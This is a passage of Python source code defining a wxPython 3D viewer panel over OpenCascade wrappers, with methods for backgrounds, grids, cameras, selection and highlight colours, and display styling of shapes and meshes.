Handle_AIS_Shape)\nfrom OCC.wrapper.Aspect import (\n Aspect_DisplayConnection, Aspect_FM_CENTERED, Aspect_FM_NONE,\n Aspect_FM_STRETCH, Aspect_FM_TILED, Aspect_GDM_Lines, Aspect_GDM_None,\n Aspect_GDM_Points, Aspect_GFM_CORNER1, Aspect_GFM_CORNER2,\n Aspect_GFM_CORNER3, Aspect_GFM_CORNER4, Aspect_GFM_DIAG1, 
Aspect_GFM_DIAG2,\n Aspect_GFM_HOR, Aspect_GFM_NONE, Aspect_GFM_VER, Aspect_GT_Rectangular,\n Aspect_TOL_SOLID, Aspect_TOTP_RIGHT_LOWER)\nfrom OCC.wrapper.Graphic3d import (\n Graphic3d_AspectFillArea3d, Graphic3d_ClipPlane, V3d_GOURAUD)\nfrom OCC.wrapper.Image import Image_AlienPixMap\nfrom OCC.wrapper.MeshVS import (\n Handle_MeshVS_Mesh, MeshVS_DA_EdgeColor, MeshVS_DA_InteriorColor,\n MeshVS_DA_MarkerColor, MeshVS_DMF_Shading, MeshVS_DMF_Shrink,\n MeshVS_DMF_WireFrame)\nfrom OCC.wrapper.OpenGl import OpenGl_GraphicDriver\nfrom OCC.wrapper.Prs3d import (\n Handle_Prs3d_Drawer, Prs3d_Drawer, Prs3d_IsoAspect,\n Prs3d_TypeOfHighlight_LocalDynamic, Prs3d_TypeOfHighlight_LocalSelected,\n Prs3d_TypeOfHighlight_Selected)\nfrom OCC.wrapper.Quantity import (\n Quantity_Color, Quantity_NOC_BLACK, Quantity_NOC_GRAY75,\n Quantity_NOC_GRAY80, Quantity_NOC_WHITE)\nfrom OCC.wrapper.StdSelect import Handle_StdSelect_BRepOwner\nfrom OCC.wrapper.TColStd import (\n TColStd_ListOfInteger, TColStd_SequenceOfInteger)\nfrom OCC.wrapper.TCollection import (\n TCollection_AsciiString, TCollection_ExtendedString)\nfrom OCC.wrapper.TopAbs import (\n TopAbs_COMPOUND, TopAbs_EDGE, TopAbs_FACE, TopAbs_SHELL, TopAbs_SOLID,\n TopAbs_VERTEX, TopAbs_WIRE)\nfrom OCC.wrapper.V3d import (\n V3d_Viewer, V3d_Xneg, V3d_Xpos, V3d_XposYposZpos, V3d_Yneg,\n V3d_Ypos, V3d_ZBUFFER, V3d_Zneg, V3d_Zpos)\nfrom OCC.wrapper.gp import gp_Dir, gp_Pln, gp_Pnt\n\nfrom OCC.gui import OCCDeprecationWarning\nfrom OCC.gui.camera import Camera\nfrom OCC.gui.events import (\n create_left_click_background_event, create_left_click_object_event,\n create_right_click_background_event, create_right_click_object_event)\nfrom OCC.gui.interactive_objects import (\n make_ais_coloredshape, make_ais_text_label, make_ais_trihedron)\nfrom OCC.gui.utils import concurrency_guard\nfrom OCC.utils.utilities import QuantityColor_rgb, py_QuantityColor\n\n# TODO (PP): uncomment when vector export is supported again\n# from OCC.gui.enums import ext_Graphic3d_ExportFormat\n\nVALID_BITMAP_EXTENSIONS = [\"bmp\", \"png\", \"gif\", \"jpg\"]\nVALID_VECTOR_EXTENSIONS = []\nVALID_IMAGE_EXTENSIONS = VALID_BITMAP_EXTENSIONS + VALID_VECTOR_EXTENSIONS\n\nVALID_BITMAP_EXTENSIONS_SET = frozenset(VALID_BITMAP_EXTENSIONS)\nVALID_VECTOR_EXTENSIONS_SET = frozenset(VALID_VECTOR_EXTENSIONS)\n\n__all__ = [\"ViewerWindow\", \"Viewer\"]\n\nNAME_TO_SEL_MODE = {\n \"vertices\": AIS_Shape_SelectionMode(TopAbs_VERTEX),\n \"edges\": AIS_Shape_SelectionMode(TopAbs_EDGE),\n \"wires\": AIS_Shape_SelectionMode(TopAbs_WIRE),\n \"faces\": AIS_Shape_SelectionMode(TopAbs_FACE),\n \"shells\": AIS_Shape_SelectionMode(TopAbs_SHELL),\n \"solids\": AIS_Shape_SelectionMode(TopAbs_SOLID),\n \"compounds\": AIS_Shape_SelectionMode(TopAbs_COMPOUND),\n \"default\": 0,\n}\nSEL_MODE_TO_NAME = dict(zip(NAME_TO_SEL_MODE.values(),\n NAME_TO_SEL_MODE.keys()))\n\n\n# TODO (RvD): user now in charge of not re-displaying the same object.\n# /todo consider caching calls to display()\n# TODO (RvD): Remove wx.ClientDC and use OCC AIS_RubberBand from 7.0.0.\nclass Viewer(wx.Panel):\n \"\"\"Viewer panel for wx-backend. Supports mouse rotation, panning, zooming,\n etc. Background style can be one of 3 modes:\n\n 1. single color mode, e.g. \"red\" or (255, 0, 0).\n :meth:`set_background_color`.\n 2. gradient color mode, e.g. (\"red\", \"blue\") or ((255, 0, 0), (0, 0, 255)).\n :meth:`set_background_color_gradient`.\n 3. background image mode: specify filename of background image.\n :meth:`set_background_image`.\n\n .. 
note:: Once a mode has been set, it not possible to switch between\n modes. Any attempt to switch mode, will be ignored.\n \"\"\"\n #: the default number of U and V isoparameters displayed\n ISOS = 0, 0\n #: show isolines on planar faces?\n ISOS_ON_PLANE = True\n #: highlight selected objects?\n HIGHLIGHT_SELECTED = False\n #: Show edges of\n DRAW_FACE_BOUNDARIES = True\n #: size of triedron as factor of windows size\n TRIEDRON_SCALE = 0.1\n #: title for V3d_Viewer object\n V3D_VIEWER_TITLE = \"viewer\"\n #: top color of background gradient\n BG_RGB_COLOR_TOP = 153, 204, 255\n #: bottom color of background gradient\n BG_RGB_COLOR_BOT = 0, 128, 255\n #: latency for drawing rubberband boxes in seconds\n LATENCY = 0.04\n #: adapt to default value for OpenCascade\n DEFAULT_DISPLAY_PRIORITY = 5\n #: Should iso-lines be created on the triangulation?\n ISO_ON_TRIANGULATION = True\n #: Color for selection of the faces for >1D shapes (Default: #FF7900)\n DEFAULT_SELECTION_COLOR = (0xFF, 0x79, 0x00)\n #: Color of the edges on selection (Default: `Quantity_NOC_GRAY80`)\n DEFAULT_SELECTION_EDGE_COLOR = Quantity_NOC_GRAY80\n #: Color of the edges on a highlight. (Default: #EAA864)\n DEFAULT_HIGHLIGHT_COLOR = (0xEA, 0xA8, 0x64)\n #: Color of the edges when highlighting a subshape. (Default: #EAA864)\n DEFAULT_SUBSHAPE_HIGHLIGHT_COLOR = DEFAULT_HIGHLIGHT_COLOR\n #: Color of the faces/edges when selecting a subshape. (Default: #EAA864)\n DEFAULT_SUBSHAPE_SELECTION_COLOR = DEFAULT_SELECTION_COLOR\n #: Presentation mode for trihedrons.\n DEFAULT_TRIHEDRON_DISPLAY_MODE = 'wireframe'\n\n py_Aspect_GradientFillMethod = {\n None: Aspect_GFM_NONE,\n \"horizontal\": Aspect_GFM_HOR,\n \"vertical\": Aspect_GFM_VER,\n \"diag1\": Aspect_GFM_DIAG1,\n \"diag2\": Aspect_GFM_DIAG2,\n \"corner1\": Aspect_GFM_CORNER1,\n \"corner2\": Aspect_GFM_CORNER2,\n \"corner3\": Aspect_GFM_CORNER3,\n \"corner4\": Aspect_GFM_CORNER4}\n\n py_Aspect_FillMethod = {\n None: Aspect_FM_NONE,\n \"centered\": Aspect_FM_CENTERED,\n \"tiled\": Aspect_FM_TILED,\n \"stretched\": Aspect_FM_STRETCH}\n\n py_Aspect_GridDrawMode = {\n None: Aspect_GDM_None,\n \"lines\": Aspect_GDM_Lines,\n \"points\": Aspect_GDM_Points}\n\n py_DisplayMode = {\n \"wireframe\": 0,\n \"shaded\": 1,\n \"quick_hlr\": 2,\n \"exact_hlr\": 3}\n\n py_DisplayModeMesh = {\n \"shrink\": MeshVS_DMF_Shrink,\n \"shaded\": MeshVS_DMF_Shading,\n 'wireframe': MeshVS_DMF_WireFrame}\n\n DisplayMode_py = {\n 0: \"wireframe\",\n 1: \"shaded\",\n 2: \"quick_hlr\",\n 3: \"exact_hlr\"}\n\n py_AIS_TOAX = {\n None: AIS_TOAX_Unknown,\n \"x\": AIS_TOAX_XAxis,\n \"y\": AIS_TOAX_YAxis,\n \"z\": AIS_TOAX_ZAxis}\n\n class _UnsetStyle(object):\n __slots__ = ()\n\n UNSET_STYLE = _UnsetStyle() # flag used to unset a style\n\n def __init__(self, parent, logger=None):\n wx.Panel.__init__(self, parent)\n self.logger = logger or logging.getLogger(self.__class__.__name__)\n #: :type: OCC.V3d.Handle_V3d_Viewer\n self._v3d_viewer = None\n #: :type: OCC.V3d.Handle_V3d_View\n self._v3d_view = None\n #: :type: OCC.AIS.Handle_AIS_InteractiveContext\n self._ais_context = None\n #: :type: OCC.PrsMgr.PrsMgr_PresentationManager\n self._prsmgr_presentationmanager = None\n #: :type: ZLayers\n self.zlayers = None\n #: :type: dict\n self._keymap = {}\n #: :type: list[Handle_Graphic3d_ClipPlane]\n self._clipplanes = []\n #: :type: (int, int)\n self._drag_x1_y1 = 0, 0\n #: :type: float\n self._drag_t1 = -1.0\n #: :type: wx.ClientDC\n self._dc = None\n #: :type: (float, float, float, float)\n self._selected_area = None\n #: 
:type: bool\n self._dragged = False\n #: One of None, 'uniform', 'gradient' or 'image\".\n # :type: str\n self._bg_mode = None\n #: Default background color\n self._default_background_color = None\n #: last used path to background image\n self._bg_image = None\n #: :type: bool\n self.triedron = True\n\n # Colors below are a tuple. The first item is the value the user sets,\n # we need to return this to the user when he asks for it again. The\n # second item is the one for internal use (Quantity_Color)\n # (color, quantity_color)\n self._selection_color = (None, None)\n # (color, quantity_color)\n self._selection_edge_color = (None, None)\n # (color, quantity_color)\n self._highlight_color = (None, None)\n\n if sys.platform == 'linux':\n top_level_parent = self.TopLevelParent\n was_shown = top_level_parent.IsShown()\n\n # To force the window being created, so that we can get the handle\n # we show the window\n top_level_parent.Show()\n while not self.GetHandle():\n # although EVT_WINDOW_CREATE notifies the event of the window\n # being created, testing if we can get a Handle seems to be\n # more reliable. Creating multiple frames with the same app\n # does not fire EVT_WINDOW_CREATE again.\n wx.SafeYield()\n\n # Restore IsShown state to what it was before we changed it\n top_level_parent.Show(was_shown)\n while not top_level_parent.IsShown() == was_shown:\n wx.SafeYield()\n\n self.Bind(wx.EVT_SIZE, self.OnSize)\n self.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)\n self.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)\n self.Bind(wx.EVT_LEFT_UP, self.OnLeftUp)\n self.Bind(wx.EVT_RIGHT_DOWN, self.OnRightDown)\n self.Bind(wx.EVT_RIGHT_UP, self.OnRightUp)\n self.Bind(wx.EVT_MIDDLE_DOWN, self.OnMiddleDown)\n self.Bind(wx.EVT_MOTION, self.OnMotion)\n self.Bind(wx.EVT_MOUSEWHEEL, self.OnWheelScroll)\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.OnEraseBackground)\n self.Bind(wx.EVT_PAINT, self.OnPaint)\n self.Bind(wx.EVT_WINDOW_DESTROY, self.OnDestroy)\n self.Bind(wx.EVT_ENTER_WINDOW, self.on_enter_window)\n\n self.left_m_down = False\n self.right_m_down = False\n\n self.init_viewer()\n self.init_layers()\n self.init_lights()\n self.init_background()\n self.init_display_mode()\n self.init_highlighting_defaults()\n self.init_triedron()\n self.init_keymap()\n self.init_dc()\n\n #: :type: OCC.gui.camera.Camera\n self.camera = Camera(self._v3d_view.Camera())\n\n def get_window_handle(self):\n hnd = self.GetHandle()\n if not hnd:\n raise RuntimeError(\"Couldn't get window handle\")\n return hnd\n\n def OnDestroy(self, evt):\n # We need to destroy the view before the window is closed, otherwise\n # it will somehow try to update it when we ask it to close, but that\n # will happen after the window is indeed gone.\n self.remove_all(False)\n\n # TODO (RvD): Test if OpenGl_View is required or Graphic3d_CView is fine.\n def init_viewer(self):\n # window.SetVirtual(True)\n connection = Aspect_DisplayConnection().handle\n driver = OpenGl_GraphicDriver(connection).handle\n title = TCollection_ExtendedString(self.V3D_VIEWER_TITLE)\n title = title.ToExtString()\n viewer = V3d_Viewer(driver, title).handle\n view = viewer.CreateView()\n hnd = self.get_window_handle()\n\n if sys.platform == 'linux':\n from OCC.wrapper.Xw import Xw_Window\n window = Xw_Window(connection, hnd).handle\n else:\n from OCC.wrapper.WNT import WNT_Window\n window = WNT_Window(hnd, Quantity_NOC_BLACK).handle\n\n view.SetWindow(window)\n\n if not window.IsMapped():\n window.Map()\n\n self._v3d_view = view\n self._v3d_viewer = viewer\n self.zlayers = 
ZLayers(viewer)\n\n self._ais_context = context = AIS_InteractiveContext(viewer).handle\n\n # we need the default value of DEVIATION for the style resets\n # here nothing has happened yet.\n self._DEFAULT_DEVIATION_COEFFICIENT = context.DeviationCoefficient()\n\n self._prsmgr_presentationmanager = context.MainPrsMgr()\n self._default_background_color = view.BackgroundColor()\n\n def init_layers(self):\n \"\"\"Template to override for different layer setup.\n\n .. attention:: on overriding, either call this method\n (``super().init_layers()``) or at least ensure that one new\n Z-layer is added to this view via :attr:`zlayers` and a call to\n :meth:`ZLayers.add_layer``. The side-effect garantuees proper\n functioning of OCC's default ``Graphic3d_ZLayerId_Top`` layer (e.g.\n Manipulator object depends on this and would otherwise not highlight\n on hover).\n \"\"\"\n self.zlayers.add_layer()\n\n def init_lights(self):\n self._v3d_viewer.SetDefaultLights()\n self._v3d_viewer.SetLightOn()\n\n def init_background(self):\n self.set_background_color_gradient(self.BG_RGB_COLOR_TOP,\n self.BG_RGB_COLOR_BOT)\n\n def init_display_mode(self):\n context = self._ais_context\n v3d_view = self._v3d_view\n\n # ---- shading with edges ----\n context.SetDisplayMode(AIS_Shaded, False)\n v3d_view.SetShadingModel(V3d_GOURAUD)\n drawer: Handle_Prs3d_Drawer = context.DefaultDrawer()\n drawer.SetFaceBoundaryDraw(self.DRAW_FACE_BOUNDARIES)\n\n # ---- isos ----\n self.set_isos(*self.ISOS)\n context.IsoOnPlane(self.ISOS_ON_PLANE)\n context.IsoOnTriangulation(self.ISO_ON_TRIANGULATION)\n\n def init_highlighting_defaults(self):\n context = self._ais_context\n\n # ---- selecting ----\n self.selection_color = self.DEFAULT_SELECTION_COLOR\n self.selection_edge_color = self.DEFAULT_SELECTION_EDGE_COLOR\n self.subshape_selection_color = self.DEFAULT_SUBSHAPE_SELECTION_COLOR\n\n # ---- hilighting ----\n context.SetToHilightSelected(self.HIGHLIGHT_SELECTED)\n self.highlight_color = self.DEFAULT_HIGHLIGHT_COLOR\n self.subshape_highlight_color = self.DEFAULT_SUBSHAPE_HIGHLIGHT_COLOR\n\n def _update_selection_highlighting(self):\n drawer: Handle_Prs3d_Drawer = self._ais_context.HighlightStyle(\n Prs3d_TypeOfHighlight_Selected)\n\n drawer.SetDisplayMode(-1) # Currently active display mode.\n\n selection_color = self._selection_color[1]\n # fill color:\n if selection_color:\n fill_style = drawer.BasicFillAreaAspect()\n if fill_style.IsNull():\n fill_style = Graphic3d_AspectFillArea3d().handle\n drawer.SetBasicFillAreaAspect(fill_style)\n\n fill_style.SetInteriorColor(selection_color)\n\n edge_color = self._selection_edge_color[1]\n if edge_color:\n drawer.SetColor(edge_color) # edge color\n\n @property\n def selection_color(self):\n return self._selection_color[0]\n\n @selection_color.setter\n def selection_color(self, color):\n \"\"\"Set selection color.\n\n :param color: color to show on selection, e.g. ``red``, ``(255, 0, 0)``\n or ``Quantity_NOC_RED``.\n :type: str | (float, float, float) | int\n :return:\n \"\"\"\n q_color = py_QuantityColor(color, str_default=None)\n self._selection_color = (color, q_color)\n self._update_selection_highlighting()\n\n @property\n def selection_edge_color(self):\n return self._selection_edge_color[0]\n\n @selection_edge_color.setter\n def selection_edge_color(self, color):\n \"\"\"Color of the boundary edges.\n\n :param color: color to show on selection, e.g. 
``red``, ``(255, 0, 0)``\n or ``Quantity_NOC_RED``.\n :type: str | (float, float, float) | int\n :return:\n \"\"\"\n q_color = py_QuantityColor(color, str_default=None)\n self._selection_edge_color = (color, q_color)\n self._update_selection_highlighting()\n\n @property\n def subshape_selection_color(self):\n return self._subshape_selection_color[0]\n\n @subshape_selection_color.setter\n def subshape_selection_color(self, color):\n \"\"\"Set the sub-shape selection color.\n\n :param color: color to show on selection, e.g. ``red``, ``(255, 0, 0)``\n or ``Quantity_NOC_RED``.\n :type: str | (float, float, float) | int\n :return:\n \"\"\"\n q_color = py_QuantityColor(color, str_default=None)\n self._subshape_selection_color = (color, q_color)\n\n # we create a new drawer so that the current boundary\n # edge color remains intact\n drawer = Prs3d_Drawer().handle\n drawer.SetColor(q_color)\n # Set the display mode to whatever is active now. This means that in\n # shaded mode the faces will be highlighted. In wireframe the edges\n # will be highlighted.\n drawer.SetDisplayMode(-1)\n\n self._ais_context.SetHighlightStyle(\n Prs3d_TypeOfHighlight_LocalSelected, drawer)\n\n @property\n def highlight_color(self):\n return self._highlight_color[0]\n\n @highlight_color.setter\n def highlight_color(self, color):\n \"\"\"Set the highlight (hover) color.\n\n :param color: color to show on highlight, e.g. ``red``, ``(255, 0, 0)``\n or ``Quantity_NOC_RED``.\n :type: str | (float, float, float) | int\n :return:\n \"\"\"\n q_color = py_QuantityColor(color, str_default=None)\n style = self._ais_context.HighlightStyle()\n style.SetColor(q_color)\n style.SetDisplayMode(0) # wireframe\n self._highlight_color = (color, q_color)\n\n @property\n def subshape_highlight_color(self):\n return self._subshape_highlight_color[0]\n\n @subshape_highlight_color.setter\n def subshape_highlight_color(self, color):\n \"\"\"Set the sub-shape highlight color.\n\n 
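A minimal sketch (``viewer`` being a :class:`Viewer` instance; the\n color name is illustrative)::\n\n viewer.subshape_highlight_color = \"red\"\n\n :param color: color to show on highlight, e.g. 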
``red``, ``(255, 0, 0)``\n or ``Quantity_NOC_RED``.\n :type: str | (float, float, float) | int\n :return:\n \"\"\"\n q_color = py_QuantityColor(color, str_default=None)\n style = self._ais_context.HighlightStyle(\n Prs3d_TypeOfHighlight_LocalDynamic)\n style.SetColor(q_color)\n style.SetDisplayMode(0) # wireframe\n self._subshape_highlight_color = (color, q_color)\n\n def init_triedron(self):\n white = Quantity_Color(Quantity_NOC_WHITE)\n return self._v3d_view.TriedronDisplay(\n Aspect_TOTP_RIGHT_LOWER, white, self.TRIEDRON_SCALE, V3d_ZBUFFER)\n\n def init_keymap(self):\n # beware: evt.GetKeyCode() capitalizes keys, so pressing 'w' -> 'W'.\n self._keymap = {\n ord('W'): self.OnKeyW,\n ord('S'): self.OnKeyS,\n ord('F'): self.OnKeyF,\n ord('C'): self.OnKeyC,\n ord('Q'): self.OnKeyQ,\n ord('A'): self.OnKeyA,\n # 127 matches DEL button on Win64\n 127: self.OnKeyDEL,\n # 27 matches ESC button on Win64\n 27: self.onKeyESC\n }\n\n def init_dc(self):\n self._dc = dc = wx.ClientDC(self)\n # color = wx.Colour(73, 149, 209) # ParaPy Blue\n color = wx.BLACK\n pen = wx.Pen(color, 1, wx.LONG_DASH)\n dc.SetPen(pen)\n # dc.SetPen(wx.GREY_PEN)\n # dc.SetBackgroundMode(wx.TRANSPARENT)\n # dc.SetBrush(wx.TRANSPARENT_BRUSH)\n\n # TODO (RvD): Does this take effect on already displayed objects?\n def set_isos(self, u, v):\n if u == v:\n self._ais_context.SetIsoNumber(u, AIS_TOI_Both)\n else:\n self._ais_context.SetIsoNumber(u, AIS_TOI_IsoU)\n self._ais_context.SetIsoNumber(v, AIS_TOI_IsoV)\n\n def set_display_mode_shaded(self, update=True):\n self._v3d_view.SetComputedMode(False)\n self._ais_context.SetDisplayMode(AIS_Shaded, update)\n self.update_selected()\n\n def set_display_mode_wireframe(self, update=True):\n self._v3d_view.SetComputedMode(False)\n self._ais_context.SetDisplayMode(AIS_WireFrame, update)\n self.update_selected()\n\n def set_display_mode_hlr(self):\n self._v3d_view.SetComputedMode(True)\n self.update_selected()\n\n def activate_grid(self, xorig, yorig, zorig, width, length, xstep, ystep,\n angle=0, mode=\"lines\"):\n \"\"\"Activate a rectangular grid. ``xorig`` and ``yorig`` define the\n origin of the grid. ``xstep`` defines the interval between 2\n vertical lines. ``ystep`` defines the interval between 2 horizontal\n lines. ``angle`` defines the rotation angle of the grid. 
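A minimal\n call (all values are illustrative)::\n\n viewer.activate_grid(0, 0, 0, 100, 100, 10, 10)\n\n 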
``width``\n and ``length`` define the dimensions of the grid.\n\n :param float xorig: X-coordinate of grid\n :param float yorig: Y-coordinate of grid\n :param float zorig: Z-coordinate of grid\n :param float width: width of grid\n :param float length: length of grid\n :param float xstep: interval between 2 vertical lines\n :param float ystep: interval between 2 horizontal lines\n :param float angle: rotation angle of grid\n :param str | None mode: either 'lines', 'points' or None.\n \"\"\"\n mode = self.py_Aspect_GridDrawMode[mode]\n v3d_viewer = self._v3d_viewer\n v3d_viewer.ActivateGrid(Aspect_GT_Rectangular, mode)\n # for some reason OCC takes half-width and half-length inputs.\n v3d_viewer.SetRectangularGridGraphicValues(width / 2., length / 2.,\n zorig)\n # for some reason, x and y are reversed in OCC.\n v3d_viewer.SetRectangularGridValues(-xorig, -yorig, xstep, ystep,\n angle)\n\n def deactivate_grid(self):\n self._v3d_viewer.DeactivateGrid()\n\n def reset_background(self, update=True):\n if self._bg_mode == \"uniform\":\n self._v3d_view.SetBackgroundColor(self._default_background_color)\n if update:\n self.update()\n elif self._bg_mode == \"gradient\":\n white = Quantity_Color(Quantity_NOC_WHITE)\n black = Quantity_Color(Quantity_NOC_BLACK)\n self._v3d_view.SetBgGradientColors(white, black,\n Aspect_GFM_NONE, update)\n elif self._bg_mode == \"image\":\n self._v3d_view.SetBackgroundImage(\n self._bg_image, Aspect_FM_NONE, update)\n self._bg_image = None\n self._bg_mode = None\n\n def set_background_color(self, color, update=True):\n \"\"\"Set uniformly colored background:\n\n >>> self.set_background_color(\"white\")\n >>> self.set_background_color((255, 255, 255))\n \"\"\"\n if self._bg_mode == \"gradient\" or self._bg_mode == \"image\":\n self.reset_background(False)\n self._v3d_view.SetBackgroundColor(py_QuantityColor(color))\n if update:\n self.update()\n self._bg_mode = \"uniform\"\n\n def set_background_color_gradient(self, color1, color2, style=\"vertical\",\n update=True):\n \"\"\"Set background of viewer with gradient from top ``color1`` to\n bottom ``color2``.\n\n >>> self.set_background_color_gradient(\"white\", \"black\")\n >>> self.set_background_color_gradient((255, 255, 255), (0, 0, 0))\n\n :type color1: str | (float, float, float)\n :type color2: str | (float, float, float)\n :param style: valid values are (None, \"horizontal\", \"vertical\",\n \"diag1\", \"diag2\", \"corner1\", \"corner2\", \"corner3\", \"corner4\")\n :param bool update: update viewer immediately?\n \"\"\"\n if self._bg_mode == \"image\":\n self.reset_background(False)\n style = self.py_Aspect_GradientFillMethod[style]\n self._v3d_view.SetBgGradientColors(py_QuantityColor(color1),\n py_QuantityColor(color2),\n style, update)\n self._bg_mode = \"gradient\"\n\n def set_background_image(self, pathname, style=\"centered\", update=True):\n \"\"\"Set background image, either .gif, .bmp or .xwd format.\n\n >>> self.set_background_image(\"path/to/image.bmp\")\n\n :param str pathname: path to image\n :param style: valid values are (None, \"centered\", \"tiled\", \"stretched\")\n :param bool update: update viewer immediately?\n \"\"\"\n pathname = os.path.abspath(pathname)\n if not os.path.isfile(pathname):\n raise RuntimeError(\n \"Background image '{}' does not exist\".format(pathname))\n if self._bg_mode == \"gradient\":\n self.reset_background(False)\n style = self.py_Aspect_FillMethod[style]\n self._v3d_view.SetBackgroundImage(pathname, style, update)\n self._bg_mode = \"image\"\n self._bg_image = 
pathname\n\n def set_camera(self, camera, update=True):\n \"\"\"Set the camera of the viewer to ``camera``.\n\n :param Camera camera: Camera position and settings that should be\n applied to the Viewer.\n :param bool update: Should we update the Viewer?\n \"\"\"\n prev_aspect = self.camera.aspect_ratio\n\n # update view\n self.camera.copy_from_camera(camera)\n\n if prev_aspect != camera.aspect_ratio:\n # If the aspect ratio of the given camera is different from that\n # of the screen, we need to resize\n self._v3d_view.MustBeResized()\n\n if update:\n self.update()\n\n def get_camera(self, copy=True):\n \"\"\"Return :attr:`camera` or a ``copy`` of it. The latter is useful\n when you do not want the returned camera to change when the current\n view changes, or vice-versa.\n\n :param bool copy: if set to :py:`True` returns a copy of the camera.\n :rtype: Camera\n \"\"\"\n if copy:\n camera = Camera()\n camera.copy_from_camera(self.camera)\n return camera\n else:\n return self.camera\n\n def fit_all(self):\n v3d_view = self._v3d_view\n v3d_view.ZFitAll()\n v3d_view.FitAll()\n\n def hide(self, obj, update=True, fit=False):\n # don't update twice (fit will also update)\n self._ais_context.Erase(obj, False if fit else update)\n if fit:\n self.fit_all()\n\n def hide_all(self, update=True):\n self._ais_context.EraseAll(update)\n\n def hide_selected_objects(self, update=True, fit=False):\n # don't update twice (fit will also update)\n update = False if fit else update\n self._ais_context.EraseSelected(update)\n if fit:\n self.fit_all()\n\n def update(self):\n \"\"\"Redraw OCC V3D_View.\"\"\"\n self._v3d_view.Redraw()\n\n def move_to(self, x, y):\n \"\"\"Relays mouse position in pixels ``x`` and ``y`` to the interactive\n context selectors.\n\n :rtype: int\n :returns: AIS_StatusOfDetection\n \"\"\"\n return self._ais_context.MoveTo(x, y, self._v3d_view, True)\n\n def move_to_current_mouse_position(self):\n \"\"\"Relays current mouse position to the interactive context selectors.\n\n :rtype: int\n :returns: AIS_StatusOfDetection\n \"\"\"\n screen_pos = wx.GetMousePosition()\n x, y = self.ScreenToClient(screen_pos)\n return self.move_to(x, y)\n\n update_selector = move_to_current_mouse_position\n\n def display(self, obj, update=True, fit=True):\n # prevent updating twice, fit will do this already\n self._ais_context.Display(obj, False if fit else update)\n if fit:\n self.fit_all()\n return obj\n\n # TODO (TBD): investigate if AIS_Shape can still be used and render edges.\n def display_topods_shape(self, topods_shape, **kwargs):\n # ais_shape = AIS_Shape(topods_shape).handle\n obj = make_ais_coloredshape(topods_shape)\n return self.display(obj, **kwargs)\n\n def display_text(self, text, pt, top_most=False, height=None, **kwargs):\n obj = make_ais_text_label(text, pt, top_most=top_most, height=height)\n return self.display(obj, **kwargs)\n\n def display_trihedron(self, pt, vz=(0, 0, 1), vx=(1, 0, 0),\n size=None, zoom_persistent=False,\n keep_on_top=False, display_mode=None,\n **kwargs):\n display_mode = display_mode or \\\n self.DEFAULT_TRIHEDRON_DISPLAY_MODE\n size = size or 1\n obj = make_ais_trihedron(pt, vz=vz, vx=vx, size=size,\n zoom_persistent=zoom_persistent,\n keep_on_top=keep_on_top,\n display_mode=display_mode)\n return self.display(obj, **kwargs)\n\n def display_all(self, update=True, fit=False):\n # prevent updating twice, fit will do this already\n self._ais_context.DisplayAll(False if fit else update)\n if fit:\n self.fit_all()\n\n def remove(self, obj, update=True, fit=True):\n # 
prevent updating twice, fit will do this already\n self._ais_context.Remove(obj, False if fit else update)\n if fit:\n self.fit_all()\n\n def remove_all(self, update=True):\n self._ais_context.RemoveAll(update)\n\n def apply_style(self, obj, color=None, transparency=None,\n display_mode=None, line_thickness=None,\n deviation_coefficient=None, u_isos=None, v_isos=None,\n display_priority=None, mesh_vertex_color=None,\n mesh_edge_color=None, mesh_face_color=None, update=True):\n \"\"\"Apply display style to ``obj``.\n\n One can unset values by passing ``Viewer.UNSET_STYLE``, although this\n currently does not work for display_priority.\n\n :param OCC.AIS.AIS_InteractiveObject obj: object to display in viewer\n :param (float, float, float) | str | None color: color of ``obj``\n :param float | None | Viewer._UnsetStyle transparency: between 0.0 (\n opaque) - 1.0 (fully transparent)\n :param str | None display_mode: 'wireframe' -> AIS_WireFrame |\n 'shaded' -> AIS_Shaded\n :param int | None | Viewer._UnsetStyle line_thickness: >= 1\n :param float | None | Viewer._UnsetStyle deviation_coefficient: > 0.0\n :param int | Viewer._UnsetStyle u_isos: number of isolines in u-direction\n :param int | Viewer._UnsetStyle v_isos: number of isolines in v-direction\n :param (float, float, float) | str | None mesh_face_color: color of\n mesh faces\n :param (float, float, float) | str | None mesh_edge_color: color of\n mesh edges\n :param (float, float, float) | str | None mesh_vertex_color: color of\n mesh vertices\n :param int | str | None display_priority: display priority of ``obj``\n (default is 5)\n :param bool update: redisplay the object?\n \"\"\"\n context = self._ais_context\n redisplay = False\n UNSET = Viewer.UNSET_STYLE\n\n if isinstance(obj, Handle_MeshVS_Mesh):\n # after .SetColor(), redisplay to have the color change take effect.\n new_colors = [mesh_face_color, mesh_edge_color, mesh_vertex_color]\n if any(new_colors):\n redisplay = True\n drawer = obj.GetDrawer()\n \"\"\":type: OCC.MeshVS.MeshVS_Drawer\"\"\"\n\n color_flags = (MeshVS_DA_InteriorColor,\n MeshVS_DA_EdgeColor, MeshVS_DA_MarkerColor)\n\n if UNSET in new_colors:\n # reset all colors, then re-apply the ones the caller\n # did not touch\n get_color = drawer.GetColor\n old_colors = (get_color(flag) for flag in color_flags)\n\n for i, (old_color, new_color) in enumerate(\n zip(old_colors, new_colors)):\n if new_color is None:\n # no new value given, so we restore the old value\n new_colors[i] = old_color\n elif new_color is UNSET:\n # we do not set these again after the reset\n new_colors[i] = None\n\n obj.UnsetColor() # reset all colors to defaults\n\n set_color = drawer.SetColor\n for flag, color in zip(color_flags, new_colors):\n if color:\n set_color(flag, py_QuantityColor(color))\n\n if display_mode is not None:\n # FIXME (TBD): when using SetDisplayMode(), context.Redisplay()\n # /fixme or context.Update() do not reflect the change. Drastic\n # /fixme way for now is to Remove the shape entirely.\n was_displayed = False\n if context.IsDisplayed(obj):\n context.Remove(obj, False)\n was_displayed = True\n\n if display_mode is UNSET:\n obj.UnsetDisplayMode()\n else:\n mode = self.py_DisplayModeMesh[display_mode]\n obj.SetDisplayMode(mode)\n\n if was_displayed:\n context.Display(obj, False)\n redisplay = False\n\n else: # normal InteractiveObject that is not a mesh\n if color:\n color = py_QuantityColor(color)\n context.SetColor(obj, color, False)\n\n 
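# Note: in the blocks below, passing ``Viewer.UNSET_STYLE`` restores a\n # property to the context default, while ``None`` leaves it untouched\n # (see the docstring above).\n # FIXME (RvD): Boundary edges in front of non-transparent object,\n # /fixme are hidden. 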
